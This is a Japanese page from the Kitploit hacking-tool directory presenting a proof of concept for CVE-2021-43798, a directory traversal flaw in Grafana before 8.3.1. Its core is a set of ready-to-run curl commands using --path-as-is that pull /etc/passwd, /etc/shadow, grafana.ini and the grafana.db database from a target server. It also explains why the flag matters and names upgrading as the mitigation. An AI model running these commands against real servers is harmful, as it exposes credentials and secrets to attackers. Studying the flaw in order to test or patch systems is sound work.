Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-43798 | Kitploit
ツール/GitHubGitHub/malekalthubiany/cve-2021-43798
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubmalekalthubiany/cve-2021-43798

CVE-2021-43798

リポジトリを見る
2年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Grafana CVE-2021-43798 エクスプロイト

概要

このリポジトリは、Grafana のディレクトリトラバーサル脆弱性である CVE-2021-43798 の悪用を実演するものです。この脆弱性により、攻撃者はサーバー上の任意のファイルを読み取ることができます。

CVE の詳細

  • CVE: CVE-2021-43798
  • 説明: 8.3.1 より前の Grafana バージョンにおけるディレクトリトラバーサル脆弱性。
  • 影響: 認証されていない攻撃者がサーバー上の任意のファイルを読み取ることができます。

前提条件

  • 実行中の脆弱なバージョンの Grafana(8.3.1 より前)
  • 対象の Grafana インスタンスへのアクセス

悪用手順

curl を使用する

この脆弱性を手動で悪用するには、以下の curl コマンドのいずれかを使用して、機密ファイルの読み取りを試みることができます。

root@kitploit:~
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"

--path-as-is が必要な理由

この脆弱性を悪用するにあたり、--path-as-is オプションは不可欠です。特別に細工されたトラバーサルシーケンス(../../../../../)を改変されることなくサーバーに直接送信できるため、意図されたディレクトリの外にあるサーバー上の機密ファイルにアクセスできる可能性があります。

--path-as-is を使用しない場合、curl はパスを /public/plugins/Users/install.txt のような形に正規化してしまい、脆弱性を悪用できません。--path-as-is を使用することで、正確なトラバーサルシーケンスが保持され、エクスプロイトが成功します。

ドキュメント参照

curl ドキュメントには、--path-as-is オプションの詳細が記載されています。--path-as-is を理解して活用することで、セキュリティ専門家や研究者は、Web アプリケーションのディレクトリトラバーサル脆弱性を効果的に実演およびテストできます。

緩和策

この脆弱性を緩和するには、Grafana をバージョン 8.3.1 以降にアップグレードしてください。

ツールをダウンロード